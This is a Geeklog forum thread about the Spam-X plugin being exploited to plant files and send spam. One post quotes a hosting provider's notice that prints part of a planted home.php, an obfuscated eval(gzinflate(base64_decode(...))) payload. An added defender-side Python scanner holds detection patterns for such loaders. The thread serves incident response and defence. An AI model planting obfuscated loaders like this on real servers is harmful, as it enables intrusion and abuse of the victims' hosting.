Rictor

Anonymous
The file spamx/BlackList.Examine.class.php was being maliciously exploited to start up irc clients and plant other malicious php files on my server. I just upgraded from 1.4.0 to the latest version of Geeklog after deleting the malicious files, and I was wondering if this exploit was corrected in the new version or not? A quick search of Google found that the exploit is being discussed on several hacking sites.


Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
This issue was fixed with the release of Geeklog 1.4.0sr4 on June 30th, 2006.

It only affected incorrectly installed Geeklog setups. Which, as we have learned since, includes pretty much every install that was done using auto-installers such as Fantastico.

As usual, we suggest that Geeklog users subscribe to our (low traffic) geeklog-announce mailing list to be informed about new releases and security issues.

bye, Dirk

BMcDonald

Anonymous
Hi,

I just got a notice from my provider that this exploit happened on my system. I'm running 1.4.1, and I think I did do the upgrade with Fantastico.

I've read some problems with upgrading spamx. I'm running 1.1.0

Would it make more sense to just uninstall that version and install the latest one fresh? I found a 1.3.9 version, but saw a post that said there's a 1.5.2 version. Any idea where that one is?

Thanks


Dirk

The latest version of Geeklog can always be downloaded from here. You can update your Fantastico install with this version - just make sure to run the install script in upgrade mode (see the installation instructions for details).

bye, Dirk

radu

Anonymous
I did an upgrade and my spamx was corrupted, letting hackers send thousands of emails out. I also got penalized with $250 for one of my IPs that was blacklisted. Is Spamx safe or not? Can the site run without it?

This is the message I got from my server provider:


http://cluj-napoca.com/plugins/spamx/home.php

that is NOT a standard thing installed by Fantastico and the
entire home.php page is obfuscated php designed specifically to hide what it
does.

Text Formatted Code

root@hosting [/home/master/public_html/plugins/spamx]# head home.php
<? eval
(gzinflate(base64_decode("vRr9V9u29udxTv8HTWPgNOQT6FYSp+sorN0bpSts77zT9nAUW0k0HDu1ZCBr+d/fvZJsK4lDaV/f/AOxdD91db8k82BDjDwhJVfe5sWr07PzN9ssUCKJt9+RGql9eLCxacb+MrgHoCmXko15AbNjA+RTJqJISFWAixmDMEqTaQHDgZlO+Syaq6SA2LEBymz4Fw9KlnacU7IoZlPukJoJK09E/GIBjjMGFiSx4rFS81kJdeY00oMNYp984cQnWRrxOEhC7uWTtV4lIk/5+ALXwgLu0e/3D7/vdukOoebnE8QgJeT3kSJVKmYyYnLCZTWutdgKrp1H3Ftc65PBg43+RE0j+CX9CWchvpC+Eirig03y6vkrcsKkhD9gxZRs9lsGpLG+bTTIr5lU5EzNI068n/lYxDXSaBiw1LPa2lTxG9UKpKQaRIZJOCcfjMJDFlyO0ySLw0aQREl68F1bP3Y9I9igxohNRTQ/uOJpyGLmQqT4mx90OnaqYDAaFQxu9Y+IZ5laL/LYPBUy/7y3TEdpIxMXzcA9PyW2QipLBYu+RCaZpTyXt95097Rav6X3sHq3j+Kwpjcb0LTnEI2mt3Y41jx9u0BtCd8KIJGIL4sBWxhduSPjKv
.....
 


That is not what normal code is supposed to look like.


Dirk

Ouch - there's an embarrassing bug in our inclusion protection for some of the Spam-X modules, so that old exploit still works. Oops! Sorry about that. We'll get that fixed ASAP.

In the meantime, please fix your installation: You should not put the plugins directory into the web root (as stated in the installation instructions). If you can't put it outside of the webroot, please follow the instructions here.

bye, Dirk
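
A defender-side check for the kind of file the hosting provider describes earlier in the thread, as an added example that is not part of the thread or of Geeklog: a Python scan of a plugins directory for PHP files that `eval` a chain of decoder calls. The decoder list, suffix set, 200-character threshold and sample bytes are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# eval( wrapping one or more decoder calls. \s* tolerates the line break
# between "eval" and "(" seen in the quoted home.php, which a per-line grep misses.
EVAL_CHAIN = re.compile(
    rb"eval\s*\(\s*(?:(?:gzinflate|gzuncompress|gzdecode|str_rot13|base64_decode)\s*\(\s*)+",
    re.IGNORECASE,  # PHP function names are case-insensitive
)
# Secondary signal: a long unbroken base64-like run (threshold is an assumption).
LONG_B64 = re.compile(rb"[A-Za-z0-9+/=]{200,}")
PHP_SUFFIXES = {".php", ".php3", ".php5", ".phtml", ".inc"}

# Constructed samples: same shape as the quoted file, filler instead of a payload.
SAMPLE_OBFUSCATED = b'<? eval\n(gzinflate(base64_decode("' + b"QUJD" * 60 + b'")));'
SAMPLE_CLEAN = b"<?php\n$raw = base64_decode($_POST['avatar']);\necho strlen($raw);\n"


def scan_bytes(data):
    """Return a list of findings for one file's contents (empty list = nothing flagged)."""
    findings = []
    match = EVAL_CHAIN.search(data)
    if match:
        chain = re.sub(rb"\s+", b"", match.group(0)).decode("ascii", "replace")
        findings.append("eval-of-decoder chain: " + chain)
    if LONG_B64.search(data):
        findings.append("base64-like run of 200+ characters")
    return findings


def scan_tree(root):
    """Walk root and map each flagged PHP-like file path to its findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            try:
                findings = scan_bytes(path.read_bytes())
            except OSError as exc:
                findings = ["unreadable: %s" % exc]
            if findings:
                report[str(path)] = findings
    return report


if __name__ == "__main__":
    for name, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, "->", "; ".join(found))
```

A hit is a lead to review by hand, not proof of compromise, and a clean result does not rule out files hidden with other encodings.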